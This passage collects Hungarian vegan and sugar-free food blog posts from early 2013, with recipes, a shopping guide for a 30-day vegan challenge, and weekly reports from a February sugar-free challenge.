1/­­2 ek. agave szirup 60 ml növényi tej, pl. rizstej 10 g bio kókuszvaj felolvasztva Az összetevőket összekeverjük, és egy-egy kis merőkanállal szétterítjük egyenletesen az adagot a gofrisütőben (olajozni nem kell a formát előtte!). Kb. 4 perc alatt készre sütjük.

Amarántos mini palacsinta

2013. március 5. Vegagyerek 

Amarántos mini palacsinta A 30 Napos Vegán Kihívás egyik reggelijeként kóstolta a család!:-) Nagyon finom lett, a gyerekek is csak úgy falták!:-) Magában is finom, mi kis cukormentes szilvalekvárral ettük, én rizstejes gabonakávét ittam hozzá.:-) Amarántos teljes kiőrlésű mini palacsinták (kb. 20 perc) Hozzávalók 2 főre (6 db mini palacsintához): 60 g teljes kiőrlésű liszt 140 ml növényi tej (zabtej, vagy rizstej) 20 g agave szirup 1 csapott teáskanál foszfátmentes borkő sütőpor 1/­­2 teáskanál őrölt vanília 30 g puffasztott amaránt dió olaj, vagy bio kókuszzsír a sütéshez Elkészítés: az amaránt kivételével keverjük habverővel  simára az összes hozzávalót, és a végén adjuk hozzá az amarántot. Kenjünk ki olajjal vékonyan egy serpenyőt, tegyünk bele 1-2 evőkanál palacsinta tésztát, és süssük oldalanként kb. 4 percig. Csorgassunk rá vékonyan agave szirupot, és fogyasszuk friss gyümölccsel! Forrás: Attila Hildmann: Vegan for Fit

Vegán banános zöld turmix + a negyedik hét cukor nélkül és a nyeremények

2013. március 4. Zizi kalandjai 

Vegán banános zöld turmix + a negyedik hét cukor nélkül és a nyeremények Kicsit megkésve érkezik a negyedik cukormentes hét beszámolója, de örömmel jelentem, hogy sikeresen lezártuk a kihívást! Ha hiszitek, ha nem, vegyesek az érzelmeim. Nem volt hurrá és örömtánc, hogy végre újra ehetünk csokit, meg croissant, meg édes dolgokat. Inkább attól féltem, hogy ha újra elszaladna velem a ló, hogyan állítom majd meg?! Csakis önfegyelemmel és tudatossággal tudom.  A hétvégén volt egy kis bűnözés, de a mai napon eddig nem ettem semmi cukrosat és tervezem, hogy nem is fogok. Igyekszem megtalálni az egyensúlyt, a harmóniát, hogy ne vigyem túlzásba a cukor fogyasztást, de ne is görcsöljek rá, ha véletlenül cukor kerül az étrendembe. Úgy gondolom, ha tudatosan odafigyelek rá, akkor mindez megvalósítható. Az biztos, hogy az ízlelőbimbóink sokkal kifinomultabbak lettek. Minden sokkal édesebbnek tűnik, még egy banán és egy alma is, nem beszélve egy cukrászdai gesztenyepüréről (hétvégi bűnözés tapasztalata). Az egy hónap tapasztalata még az is, hogy nagyon sok minden ehető cukor nélkül! Vannak olyan sütemények, palacsinták, amelyeknél nem is hiányzik a cukor és egyéb édesítő, így hogy kipróbáltuk nélküle. Még szilvásgombócot is ettünk úgy, hogy anya cukormentes szilvalekvárját tettük a gombócokba. Elsőre élvezetesebb lett volna egy kis porcukorral megszórva, de másodszori evésre már nem hiányzott róla a cukor. És ez jó! Tettünk az egészségünkért, néhány gombát elüldöztünk a szervezetünkből és még tanultunk is! A legjobban annak örülök, hogy rajtunk kívül sokan bevállalták a cukormentes kihívást és hősiesen végig is csinálták. Minden heti beszámolónál jeleztem, hogy ezt nyereménnyel fogom honorálni (nem  sorsolás lesz, hanem én fogok választani nyerteseket és nem biztos, hogy olyan személyeket, akik pontosan a mi szabályaink szerint jártak el). Eddig mindenről esett már szó, csak a nyereményekről nem, pedig lehet, hogy ösztönzően hatottak volna, ha hamarabb megosztom veletek. Mindenesetre most itt sorakoznak és várják a gazdáikat. Én pedig hagyok időt nektek, hogy aki esetleg elmaradt korábbi beszámolók vagy kommentek megírásával, az most pótolja és harcba szálljon a nyereményekért (feladat: néhány soros beszámoló komment formájában a heti bejegyzések végén vagy a saját blogokon megírt beszámoló linkjének az elküldése emailben). 1. ajándék: 3 részes sütő- vagy tálaló szett fonott alátétekkel (a nyertes személyesen veheti át Budapesten). 2. ajándék: Ernyey Béla-Balaton Dóra: Ünnepek és Hétköznapok című szakácskönyve (a nyertes személyesen veheti át Budapesten). 3. ajándék: egy adag cukormentes kókuszos datolya energia golyók (a nyertes személyesen veheti át Budapesten, de ezt az ajándékot akár postázom is). Akik a negyedik cukormentes hétről beszámoltak: - Boglárka - Önismereti kalandtúra - Eszter (Dublinból csatlakozott a kihíváshoz), negyedik heti beszámoló - Zsuzsa - Zsuzska receptjei Azért a recept sem marad el... Vegán banános zöld turmix Hozzávalók 2 főre: - 500 ml mandulatej (vagy egyéb növényi tej) - 1 banán - 1 maréknyi spenót (vagy mángold vagy leveleskel vagy egyéb semleges ízű zöld) A hozzávalókat tegyük a turmixgépbe, turmixoljuk 5 percig. Ha túl sűrűnek találjuk, hígítsuk még egy kevés mandulatejjel. Hétköznap reggelente szinte mindig valamilyen turmixot, smoothie-t iszunk és a délelőtt folyamán is csak gyümölcsöt fogyasztunk, vizet valamint teát iszunk. Rengeteg változatot készítettem már korábban, vannak olyanok is, amelyek nem kerültek fel a blogra. Ez egy nagyon egyszerű, tartalmas változat, érdemes kipróbálni.

Szilvalekváros derelye

2013. február 25. BioBrigi 

Szilvalekváros derelyeKarácsonyra kaptam egy tésztakészítő gépet ajándékba, és már hosszabb ideje járt emiatt a fejemben a derelye... Nem is emlékszem mikor készítettünk utoljára. Talán Mama volt az elkövető, már nem tudom. A házi szilvalekvárunkkal töltöttem, és nyírfa porcukorral szórtuk meg fogyasztáskor. Ellenőrzött háztartásból származó :) tojásom volt, azért azzal készült, de legközelebb talán kísérletezem zabliszt és tönkölybúzaliszt keverékével. Hozzávalók: 1/­­2 kg liszt (2/­­3 rész tk) 2 tojás víz (300-350 ml) cukormentes sűrű szilvalekvár 25 dkg barna morzsa olivaolaj A lisztet a 2 tojással és a vízzel bevallom őszintén a kenyérsütő géppel dagasztattam meg, de kézzel is lehet, csak jó munkás.  Az egyik tojás fehérjéből egy kicsit tegyünk egy pohárba külön. Sajnos már nem emlékszem pontosan, hogy mennyi vizet vett fel, de 300 ml körül rémlik. Érdemes inkább kevesebbel kezdeni, azután ha szükséges még hozzáönteni. Jó kemény tésztát kell kapjunk, amit fél órát pihentetni szükséges. Takarjuk le egy konyharuhával, hogy ne száradjon. Ha letelt az idő, nyújtsuk ki vékonyra, amennyire csak lehet. Kanalazzunk a fele tésztára egymástól legalább 3 ujjnyi távolságra lekvárhalmokat. A közöket a kivett tojásfehérjével vékonyan kenjük meg. Segít a tészta összetapasztásában. (Utólagos javaslatként kaptam, nekem némelyik épp ezért kifolyt, de különösebben nem bántam.) A tészta elnyújtott másik felét ráhelyezzük, a közöket összenyomjuk, derelye vágóval elszeleteljük. Forrásban lévő sós vízben kifőzzük. (Jóval hosszabb ideig fő, mint a hagyományos tészta.) A morzsát megpirítjuk, a végén hozzákeverünk némi olajat. Ebben forgatjuk meg rögtön a kifőtt tésztát. 

A 30 NAPOS VEGÁN KIHÍVÁS - BEVÁSÁRLÓ SEGÉDLET:-)

2013. február 22. Vegagyerek 

A 30 NAPOS VEGÁN KIHÍVÁS - BEVÁSÁRLÓ SEGÉDLET:-) Fotó: urban-eve.hu BEVÁSÁRLÓS SEGÉDLET :-) Ez a bejegyzés arról fog szólni, hogy A 30 NAPOS VEGÁN KIHÍVÁS menüiben szereplő hozzávalókat hol és miként érdemes a leginkább megvásárolni? Illetve mire kell figyelni a konkrét hozzávalók kiválasztásánál? Akinek ezektől eltérő ötletei vannak a témában, ne tartsa magában!;-) Minden segítség segítség! A lista nem teljes, az összes heti hozzávaló összegyűjtéséhez kérlek nézd át az adott heti menüt! MOST AKKOR SOKKAL DRÁGÁBB LESZ AZ ÉTKEZÉSEM, HA EZEKET A DOLGOKAT VESZEM MEG? Viszonyítás kérdése... Szerintem nem feltétlenül...! Ebben a hónapban ugyanis nem fogsz venni húst, tejterméket, tojást, és kenyeret, péksüteményt is csak minimálisan! Ha most kezded átállítani a konyhád erre a fajta étkezésre, akkor bizonyos alap összetevőket meg kell venni, de azok is hosszabb távon kitartanak! HOL ÉRDEMES LEGINKÁBB VÁSÁROLNI? Pl. a DM-ben! Aki olyan helyen lakik - mint én is J -, ahol nincs belátható közelségben biobolt, mindenképpen keresse fel a legközelebbi DM biorészlegét! Nagyon sok bio és jó minőségű, sokszor egyben viszonylag jó árú termékük van (Alnatura termékek)! Bio Webáruházakban! Érdemes körbenézni a neten, és összehasonlítani az árakat, sokszor nagy különbségekkel lehet rendelni! HOZZÁVALÓK BESZERZÉSE ÉS MIRE FIGYELJ RÉSZLETESEN? Növényi tejek Nagyon sokfajta létezik már szerencsére! Én a DM-es Alnatura Zabitalt ajánlom, illetve édesebb ízekhez a Rizsitalt! Ezek összetevői ugyanis csak a tiszta gabona, víz, só és napraforgó olaj! Sok más növényi tej cukrozott, illetve egyéb adalékokkal ellátott! Árban is ez a legkedvezőbb! Ja, és finom!:-) Ára: 1 l = kb. 570 Ft Agave szirup DM ugyancsak! Fontos, hogy bio minőségűt vegyél belőle, mert egyébként mindenfélével higíthatják, és az előállítási folyamatok sem olyan tiszták! 1 üveg (250 ml) kb. 890 Ft Tippnek kaptuk még az Aldit is, ahol ugyancsak biót, és 900 Ft-ért árulnak. Olajos mag krémek Biobolt! Ezekből a krémekből már elég sokfajta létezik, gyakorlatilag 100%-os dióféle összetevő, minden más további adalék nélkül. A vegán étkezés egyik nagyon fontos hozzávalói!! Van pl. mogyorókrém, szezámmag-krém (ez a tahini), mandulakrém, kesudiókrém, diókrém stb. Adott diófélénél, mint pl. a mandulakrém, vagy a szezámmag, lehet kapni sötét és világos verziót. A sötét úgy készül, hogy a mag vékony hártyás része rajtamarad, nincsen lehántolva, és úgy darálják össze, állítják elő a krémet. Na, ezek az olcsóbb verziók! Viszont nem kicsit keserűek! Én már többfélével próbálkoztam és pl. a tahini keserű ízét a sok év alatt még mindig nem sikerült megszoknom... :-) A fehér/­­ világos változatok azok, amik a lehántolt magból kerültek előállításra. Mint pl. a fehér mandulakrém! Hmmmmm, nagggyon finom!:-) És sajnos naggggyon drága... L L Azt mondanám, hogy ezek a krémek gyak. az egyik legdrágább összetevő-csoportba tartoznak! 1 üveg mandulakrém (250 g) = 3.100 Ft körül 1 üveg kesukrém (250 g) = 2.800 Ft körül Viszont alkalmanként viszonylag keveset használunk belőle, mert nagyon tömény! Helyettesíthető mondjuk bizonyos ételeknél darált diófélével, de nem ugyanaz a hatás.. Használhatod ugyanazt a fajtát kezdetben, hogy ne kelljen kétfélét venni először! Illetve forognak a neten különféle receptek, hogyan készítsük el otthon, nekem még nem sikerült, ált. összeállt a darálóban-mixerben egy gombóccá, és nem nagyon lehetett használni utána... Teljes kiőrlésű tészták Biobolt, vagy pl. Sparban, hiperekben a Barilla teljes kiőrlésű tésztaféléi. Spenót fagyasztva Fontos, hogy tejszínnel nem sűrített parajpürét vegyél! Babfélék Ha esetleg bármi miatt az előre megfőzött, ám konzerves megoldást választod (egyszer-kétszer beleférhet szerintem...), akkor arra nagyon figyelj, hogy az adott konzerv összetevői között csak víz, só és a babféle legyen! Bio csicserit kaphatsz pl. konzervben a DM--ben! Száraz babféléket zöldségesnél, vagy hiperekben, bioboltban.   Fekete babot pl. most az Intersparban vettem. A babokat ne felejtsd el mindig előző este beáztatni! Ha puffasztó hatással van rád a fogyasztása, főzéskor tehetsz a vízbe egy kiskanál szódabikarbónát! Szoptatós anyukáknak is javasolt így főzni! Nagyobb mennyiség megfőzése után lefagyaszthatod adagokban! Amaránt puffasztva DM, vagy biobolt! Teljes kiőrlésű kenyér Legyen bio, vagy süss otthon! A hagyományos pékségekben kapható teljes kiőrlésű kenyérnek nevezett kenyerek egyrészt gyakorlatilag mind tartalmaznak tejport, másrészt rengeteg adalékot! Bio kenyérből javaslom a Piszkei Öko termékeit! Bioboltokban, de már Interspar, Kaisers áruházakban is kapható, általában csütörtökön szállítanak a legtöbb helyre frisset! Ha sütni szeretnél, akkor akár a blogomon is találsz néhány félét, de még sok más helyen is a neten! http:/­­/­­www.vegagyerek.hu/­­search/­­label/­­Keny%C3%A9r Akár veszed, akár sütöd, ha túl sok lenne, vágd darabokra, fagyaszd le, és a fogyasztás előtti napon csak kiveszed felolvadni! Cukormentes és agave szirupos lekvár Pl. cukormentes szilvalekvár! Bioboltban, vagy az Interspar saját márkás termékei közül a Prémium Szilvalekvár, annak a gyártója a Tarpai Lekvármanufaktúra! Egy 200 g-os üveg 800 Ft L Agave szirupos eperlekvár kapható a DM-ben, Alnatura termék, 200 g-os üveg 900 Ft körül van... Zabpehely Apró szeműt vegyél, mert az sokkal könnyebben megfő! A DM-ben kapható bióból viszont mostanában sokszor mellényúltam... romlott minőségűek voltak... és nagyon kemény! A Lidl-ben kapható viszont nagyon jól megfő! A legjobb viszont, ha tudsz biót beszerezni mondjuk bioboltból! Cukormentes kukoricapehely, bio kukoricadara DM! Quinoa (ejtsd: kinva) Biobolt! Köles DM! Szójajoghurt A Joya natúr szójajoghurtját keresd! Interspar, Tesco! Az Alpro natúr szójajoghurtja pl. tele van cukorral...! Agar-agar Vörös tengeri moszat kivonat zselésítéshez, biobolt! Őrőlt vaníliapor Biobolt! Tofu A füstölt ízűnek jobb az alapíze, de ebben a DM-est szerintem kivételesen ne vedd!:-) Kapható Interspar, Tesco, Auchan áruházakban! A sajtpultok környékén keresd!

Céklakrémes penne pirított mákkal + a második hét cukor nélkül

2013. február 17. Zizi kalandjai 

Céklakrémes penne pirított mákkal + a második hét cukor nélkül A cukormentes kihívás második hete nagyon könnyen telt. Néha eszünkbe jut a csoki és az édesség, főleg akkor, ha valamilyen nyálcsorgató képet látunk, de nem sóvárgunk különösebben az édesség után. Ha egy sós étel után mégis édesre vágyunk, akkor néhány szem mazsolával orvosoljuk a problémát. Kiderült, hogy a sütést sem kell kizárni teljesen az életünkből, ugyanis sikerült egy mennyei banánkenyeret sütnöm (recept jön!), amiben a banánon kívül nincsen más édesítőszer, mégis finom és édeskés az íze. Sőt! Így, hogy nem eszünk cukrot, számunkra az íze nem édeskés volt, hanem édes. Tegnap pedig hagyományos magyar palacsintát sütöttem rizstejjel és cukormentes sárgabarack-, valamint szilvalekvárt kentünk bele. A palacsintába amúgy sem teszek cukrot, a rizstej enyhén megédesítette és pont kellemes volt a savanykás lekvárokkal. Nagyon sokan beszálltatok a cukormentes kihívásba. Folyamatosan frissítem az első heti beszámolómat az újonnan érkezett linkekkel (aki ír blogot, továbbra is küldje el nekem emailben a heti beszámoló linkjét). Vegasztrománia is kihirdette Facebook oldalán, hogy nagyböjt idejére, egészen húsvétig lemond a cukorról, a csokiról és egyéb édességekről. Hajrá, Anna! A szabályok továbbra is ugyanazok: aki a nyereményjátékban is részt kíván venni, azoktól feltétlen várom a néhány soros beszámolót komment formájában itt a bejegyzés végén (csak az kerül bele a kalapba, aki mind a négy heti beszámolóhoz ír néhány sort vagy blogbejegyzést). Aki pedig használ Instagramot, az a kihívás idején februárban címkézze fel az általa elfogyasztott ételek képeit az alábbiak szerint: #februaricukormenteskihivas. Lesz egy jó kis online albumunk! Akik a második cukormentes hétről beszámoltak: - Orsi - Wannabe Chef Most pedig jöjjön ez a nagyon vörös, látványra is különleges, és ízorgiát tartogató tésztás étel... Céklakrémes penne pirított mákkal Hozzávalók 2 főre: - 200 g penne tészta - 3 közepes cékla, meghámozva, felkockázva - 3-4 gerezd fokhagyma, meghámozva, felaprítva - 2 ág friss vagy 1 teáskanál szárított kakukkfű - 4 evőkanál olívaolaj - 1 evőkanál balzsamecet - 1/­­2 bögre zöldségalaplé - 1/­­4 bögre tejszín (vagy zabtejszín) - 60 g parmezán (vagy növényi sajt), reszelve - 1 evőkanál mák - só, bors (A recepthez használt bögre 250 ml-es.) Egy tálban keverjük össze a felkockázott céklát két evőkanál olívaolajjal, a kakukkfűvel és ízlés szerint sóval, borssal. Öntsük egy tepsibe és 180 fokon süssük puhára 30-40 perc alatt. Az utolsó 10 percben szórjuk rá az aprított fokhagymát (azért a végén, hogy ne égessük meg). A megsült fokhagymás céklát tegyük konyhai robotgépbe, adjuk hozzá a balzsamecetet, még két evőkanál olívaolajat, a reszelt parmezán felét és dolgoztassuk a gépet, amíg teljesen sima, pürés állagú lesz. Ekkor öntsük egy lábasba és adjuk hozzá az alaplevet, a tejszínt és a maradék parmezánt. Jól keverjük el, ha szükséges, még sózzuk, borsozzuk és melegítsük össze 6-8 perc alatt. Közben főzzük meg sós vízben a pennét al dente (fogkemény) állagúra, szűrjük le és tegyük félre. Egy száraz serpenyőben közepes láng felett pedig pirítsuk meg a mákot 2-3 perc alatt. A megfőtt tésztát keverjük össze a céklakrémes szósszal és tálaljuk azonnal. Szórjuk meg a pirított mákkal, friss kakukkfűvel és egy kevés parmezánnal. Jó étvágyat!

Szuper reggeli: Vegán cukormentes kókuszos dió-mandula-kesudió kása hideg téli reggelekre

2013. február 11. Zizi kalandjai 

Szuper reggeli: Vegán cukormentes kókuszos dió-mandula-kesudió kása hideg téli reggelekre Egy hideg téli reggelen, főleg a hétvégéken, amikor jobban van időnk, legeslegjobb érzés egy laktató, melengető reggeli elfogyasztása. Nálunk általában a vasárnapok ilyenek. Hétköznapok rohanósak, szombaton szintén koránkelés van a piac miatt (de imádjuk, nem bánjuk egyáltalán, hogy korán kell kelnünk!), aztán jön a jól megérdemelt vasárnap, amikor engedjük magunknak, hogy kicsit tovább maradjunk ágyban, ráérősen reggelizzünk és megbeszéljük mindazt, ami a szívünket nyomja. :) Most vasárnap a szuper reggelink és egy-egy csésze hojicha japán pirított zöld tea elfogyasztása után kimentünk a hóesésben a Városligetbe. Hatalmas pelyhekben hullott a hó és gyönyörű volt az egész liget. Némely részek teljesen kihaltak, nyugodtak voltak, egyesek pedig tele szaladgáló gyerekekkel, kutyákkal, családokkal vagy csendesen sétálgató szerelmes párokkal. A cél a Városligeti-tó volt, a langyos termálvizében melegedő kacsák, sirályok meglátogatása. Mielőtt kimentünk volna a parkba még eszembe is jutott, hogy vigyünk nekik élelmet, de napraforgó- és tökmag nem volt itthon, azt pedig tudom, hogy kenyeret nem szabad adni nekik, mert az felpuffasztja őket. A tó partján sétálgatva megláttunk egy etető automatát, ahol 100 Ft-ért a markodba kapsz egy adag tápot, amivel aztán megetetheted a madarakat. Amíg mi a készülék használati útmutatóját olvastuk, nem vettük észre, hogy a hátunk mögé felsorakozott legalább 10-15 éhes kacsa. :) Ekkor jöttünk rá, hogy ők bizony már jól ismerik az automatát, tudják, hogy ezek a fura lények valahogyan szereznek belőle élelmet, amit aztán nekik adnak. Hát mi, fura lények, ezek után nem hagyhattuk, hogy éhesek maradjanak ezek a jószágok. Megvettük a tápot és megetettük azokat, akik bátrak voltak és kimerészkedtek a partra. De most már térjünk rá erre a szuper reggelire, ugye? Hát erről tényleg csak szuperlatívuszokban tudok beszélni és a legfontosabb mondanivalóm, hogy egyszer ezt mindenkinek ki kell próbálnia. Nem múlhat el élet kókuszos dió-mandula-kesudió kása nélkül! Igen, ennyire finom! És még valami... vegán, cukormentes, gluténmentes és még paleo is. Rengeteg különböző táplálkozási formát követő embernek megfelel. Nagyon egyszerű az elkészítése, csak egyetlen dologra kell odafigyelni, hogy a magokat előző este beáztassuk. Vegán cukormentes kókuszos dió-mandula-kesudió kása Hozzávalók 2 főre: - 1/­­3 bögre dió - 1/­­3 bögre mandula - 1/­­3 bögre kesudió - 1 db érett banán, meghámozva - 1 bögre kókusztej (más növényi tej is használható) - 2 evőkanál kókuszreszelék - 1 teáskanál fahéj - 1 teáskanál só + csipet só Tegyük egy tálba a diót, mandulát, kesudiót, adjunk hozzá egy teáskanál sót és öntsük fel vízzel addig, amíg teljesen ellepi. Hagyjuk állni a konyhaasztalon egy éjszakán át. Másnap öntsük le róla a vizet és mossuk át annyiszor a magokat, amíg a víz tiszta lesz. Szűrjük le és tegyük a konyhai robotgépbe. Adjuk hozzá a felkarikázott banánt, a kókusztejet, a kókuszreszeléket, a fahéjat és a csipet sót. Dolgoztassuk a robotgépet addig (kb. 8-10 perc), amíg teljesen sima, pépes állagú kását kapunk.  Ízlés szerint a végén még hígíthatjuk egy kevés kókusztejjel, ha túl sűrűnek találjuk. Fogyasztható azonnal, azonban én beleöntöttem egy kis lábasba és 5-6 perc alatt felmelegítettem. Szedjük tálkákba és szórjuk meg kókuszchips-szel, aprított mandulával és kesudióval. Kihagyhatatlan!

Sütőtökös feketebabos taco & quesadilla + az első hét cukor nélkül

2013. február 8. Zizi kalandjai 

Sütőtökös feketebabos taco & quesadilla + az első hét cukor nélkül Taco Fantasztikusak vagytok! Nem gondoltam volna, hogy ennyien beszálltok a cukormentes kihívásba! Nagyon sok emailt kaptam tele ötletekkel, élményekkel; sokan beszámoltok róla a saját blogotokon, kommenteltek itt a blogon és a Facebookon. Úgy érzem, ez a kis csapat erőt ad minden résztvevőnek, tudjátok, hogy nem vagytok egyedül. Viszonylag könnyen telt az első hét nálunk. Az elején voltak nehézségek, amikor igazán megkívántuk azt a 70%-os kocka csokit vacsora után (valószínűleg nem mi követeltük, csak a szervezetünkben élősködő kedves gombácskák). :) De utána egyre könnyebb lett. Aszalt gyümölcsök közül egyelőre mazsolát és szilvát ettünk, a friss gyümölcsök közül banánt, almát, citromot, narancsot és grapefruitot. Édes íz utáni vágyunkat frissen préselt céklalével is csillapítottuk. Sokszor van olyan érzésünk, hogy valamivel pótolnunk kell az édeset, a csokit, ilyenkor muszáj valamit nassolni... a legtöbbször mandulát pirítok vagy nyersen eszünk törökmogyorót, kesudiót, paradiót. Kollégáknak sütöttem a héten túrós pogácsát, ami nem élesztős, csak egy kis szódabikarbóna kell bele, viszont van benne tejtermék (a tojást elhagytam). Így kevésbé kerültük a tejterméket, viszont volt sós nasi! Egyetlen egyszer követtem el bakit, amikor egyik nap ebédelni mentem, a főételemhez kértem egy kis adag csalamádét. Belekóstoltam és rájöttem, hogy van benne cukor. De úgy gondolom, hogy a tudattalanul elkövetett bűnök nem számítanak, mert nem előre megfontolt szándékkal választottam cukros csalamádét. Kíváncsi vagyok, nálatok, hogy telt az első hét. Aki beszáll a nyereményjátékba is, azoktól feltétlen várom a néhány soros beszámolót komment formájában itt a bejegyzés végén vagy ha a blogján ír valaki beszámolót, akkor küldje el nekem emailben a beszámoló linkjét februári kihívás címmel. A közzétett bejegyzéseket folyamatosan frissíteni fogom és megjelentetem mind az aktuális heti beszámolókban. Aki használ Instagramot, az a kihívás idején februárban címkézze fel az általa elfogyasztott ételek képeit az alábbiak szerint: #februaricukormenteskihivas. Lesz egy jó kis online albumunk! Akik eddig írtak a cukormentes kihívásról: - Mariann - Jenis konyhai kísérletei (meglepő, hogy a férje győzte meg a cukormentes kihívásról) - Viki - Étel Ital Kicsi Vú (maximum íz, no cukor felhívással csatlakozott) - Noémi - Mandulasarok (fantasztikus gesztenyelisztes édesburgonya gnocchi receptet is megosztott) - Boglárka - Önismereti kalandtúra (januártól saját maga által összeállított étrendet fogyaszt, naponta összefoglalja, hogy mit eszik és beszállt a februári cukormentes kihívásba) - Orsi - Wannabe Chef (egy fincsi quinoa saláta receptet is megosztott) Quesadilla Most pedig irány Mexikó... A bejegyzés megírásához igyekeztem felidézni 2005-ös mexikói kalandozásaimat, amikor meglátogattam egy Pueblaban élő mexikói barátnőmet, Mariat. Ettünk étteremben is, de az anyukája rengeteg finomságot készített nekünk. Igazi jó mexikói házias koszton éltem néhány hétig. Legélénkebb emlékeimben a guacamole (avokádó krém), a paradicsomos salsa, a tortilla és a mindenhez felszolgált lime él. A taco kukorica- vagy búzalisztből készült félbe hajtott tortilla, amelyet mindenféle finomsággal (zöldségekkel, hússal, hallal) lehet megpakolni. Köretként tálalnak mellé friss koriandert, guacamolét, salsat, salátát. A quesadilla szintén kukorica- vagy búzalisztből készült tortillaból áll, két tortilla lap összeragasztva sajttal,   vékonyan megtöltve zöldségekkel vagy hússal, háromszög cikkelyekre vágva és így tálalva. Ez is fogyasztható guacamoléval, salátával, salsaval, tejföllel. Ha az alapanyagokat előző nap beszerezzük, akkor mindkét fogás kiváló gyors hétköznapi vacsorának és még az ízlelőbimbóinkat is életre keltettük! Sütőtökös feketebabos taco és quesadilla Hozzávalók 3-4 főre: Tacohoz : - 250-300 g sütőtök, meghámozva, felkockázva - 240 g feketebab (1 konzerv), leszűrve, átmosva - 1 fej vöröshagyma, felaprítva - 2 teáskanál füstölt pirospaprika - só, bors - tortilla lapok - főtt rizs - guacamole - 150 ml tejföl + 2 teáskanál csípős chiliszósz, összekeverve - koriander - lime - olívaolaj Quesadillahoz (ugyanazok, mint a tacohoz): - 150 g reszelt sajt Guacamolehoz : - 2 db érett avokádó, héj és a mag eltávolítva - 1 kis fej vöröshagyma, felaprítva - 1 gerezd fokhagyma, felaprítva - 1/­­2 lime kifacsart leve - só, bors - koriander, felaprítva Töltelék elkészítése: két evőkanál olívaolajon pirítsuk meg a felaprított vöröshagymát, adjuk hozzá a kockára vágott sütőtököt. Pároljuk 8-10 percig, majd adjuk hozzá a feketebabot. Ízesítsük sóval, borssal, szórjuk meg a füstölt pirospaprikával, keverjünk rajta egyet és tegyük félre. A tacohoz teflon serpenyőben pirítsuk meg a tortilla lap mindkét oldalát (kicsit hólyagos lesz), tegyük tányérra és kanalazzunk bele főtt rizst, sütőtökös babos keveréket, guacamolét, chilis tejfölt, szórjuk meg korianderrel, facsarjunk rá egy kevés lime levet és már ehetjük is. A quesadillahoz teflon serpenyőben kezdjük el melegíteni alacsony lángon a tortilla lap egyik oldalát. Szórjuk meg reszelt sajttal, majd várjuk meg, amíg a sajt elkezd olvadni. Ekkor vékonyan rétegezzünk rá a főtt rizsből, a sütőtökös feketebabos keverékből, majd szórjuk meg újra reszelt sajttal és tegyünk a tetejére még egy tortilla lapot. Az egészre nehezékként tegyünk néhány tányért (hogy minél vékonyabb legyen) és így pirítsuk néhány percig. Vegyük le a tányérokat és egy spatulával fordítsuk meg az egész quesadillát, hogy a felső tortilla lap is megpiruljon (közben megint tegyük a tetejére a tányérokat nehezéknek). Ha a másik oldala is megpirult, tegyük tányérra, vágjunk háromszög cikkelyeket belőle és tálaljuk guacamoléval és chilis tejföllel. A guacamoléhoz az avokádókat törjük össze villával. Adjuk hozzá a felaprított vöröshagymát, fokhagymát, a lime levét és ízesítsük sóval, borssal és felaprított korianderrel. Pirítós kenyérre kenve is kiváló feltét! Viva Mexico! Veracruz kikötő, parti sétány A legcukibb spanyol szó: burro, csacsit jelent :) Teotihuacan, ahol a Nap (La Pirámide del Sol) és a Hold (La Pirámide de la Luna) piramisok láthatók Puebla, főtér

Meggyes - Csokis Kocka

2013. február 3. Fittanyuka Blog 

Meggyes - Csokis Kocka Hétvége: Anya milyen finomságokat fogsz nekem csinálni?? Amikor ezt a kérdést kapom akkor általában összeütök egy kevert sütit. Még egy fontos szempont lett megadva, hogy legyen benne csoki is és valami gyümölcs:). A meggy jó választásnak bizonyult, mert illik a csokihoz. Akkor lássuk ezt a gyors receptet, amely melegen is és másnap reggel a tea vagy kávé mellé is nagyon finom: Hozzávalók: 250 g világos tönköly liszt 80 g nyírfacukor 1 tasak foszfátmentes sütőpor késhegynyi szódabikarbóna 1/­­2 citrom leve 1/­­2 citrom reszelt héja késhegynyi őrölt  bourbon vanília 100 g olvasztott bio margarin 250 ml víz vagy növényi tej 200 g magozott megy: lehet friss, fagyasztott vagy befőtt ( cukormentes). 100 g étcsokoládé reszelve, vagy forgács Összekeverjük a száraz hozzávalókat ( liszt, sütőpor, szódabikarbóna, vanília, citromhéj ), majd hozzáadva a nedves hozzávalókat ( víz vagy tej, olvasztott margarin, citromlé) robot gép segítségével összedolgozzuk. Egy kb. 30x23 cm-es szögletes tepsibe öntjük a masszát, tetejére szórjuk a meggy szemeket és a csokoládé forgácsokat. Előmelegített sütőben 10 percig 200 C fokon, majd további 20-25 percig 180 C fokon készre sütjük. Amikor kihűl porrá darált nyírfacukorral meghintjük .Fittanyuka

Februári cukor- és édességmentes kihívás

2013. február 1. Zizi kalandjai 

Februári cukor- és édességmentes kihívás Januárban már írtam a februári cukor- és édességmentes kihívásról. Jeleztem, hogy ha valaki szeretne részt venni a kihívásban, akkor kommentben jelezze. Megjegyeztem, hogy a kihívást végigcsinálók közül ki fogok választani valakit, aki valamilyen nyereményben részesül.  A téli időszakban, az évvégi ünnepek alatt nálunk megnövekszik az édesség fogyasztás. Egy kis süti itt, meg ott, egy kocka csoki vacsora után és észre sem vesszük, de egyre több édes dolgot eszünk, hogy a napsütés utáni vágyunkat valamivel kárpótoljuk. Tudom, hogy a fogadalmak, kihívások kezdete általában január szokott lenni, de mivel a hónap elején még sok a maradék sütemény az ünnepekről, így a kihívást mindig februárra időzítem tavaly óta. Az előző évben nagyon szigorú voltam magunkkal szemben és a cukron, süteményeken, csokin kívül vegán étrendre fogtam magunkat és a nagyon édes gyümölcsöket sem engedélyeztem. Az idén nem leszek ilyen szőrös szívű... Lássuk milyen kihívások elé állítom magunkat és azokat, akik velünk tartanak. Nem eszünk/­­iszunk: - cukrot (kristály, por, nád, kókuszvirág, pálma, stb.) - mézet - agavé-, juhar-, rizs- és malátaszirupot - olyan élelmiszert, amiben a fentiek előfordulnak (pékáru, ropi, kekszek, sütemények, szószok, stb.; húsevők figyeljenek, mert felvágottakban is lehet cukor) - kávé, fekete tea, kakaó, alkoholos italok Eszünk/­­iszunk: - friss gyümölcsöket (alma, citrom, grapefruit, narancs, mandarin, kivi, banán) - ha nagyon nem bírjuk már, akkor bekapunk egy-egy falat aszalt gyümölcsöt, olyat, ami nincsen édesítve (datolya, sárgabarack, szilva, stb.) - fogyasztható cukormentes lekvár és olyan sütemény, amely banánnal, naranccsal, céklával, répával vagy almával lett édesítve - víz, gyógytea, frissen facsart/­­centrifugázott gyümölcs- és zöldséglevek Igyekszünk kerülni: - tejtermékeket - tojást - fehér lisztből készült élesztős pékárukat Minél többet eszünk: - nyers zöldségekből, gyümölcsökből - 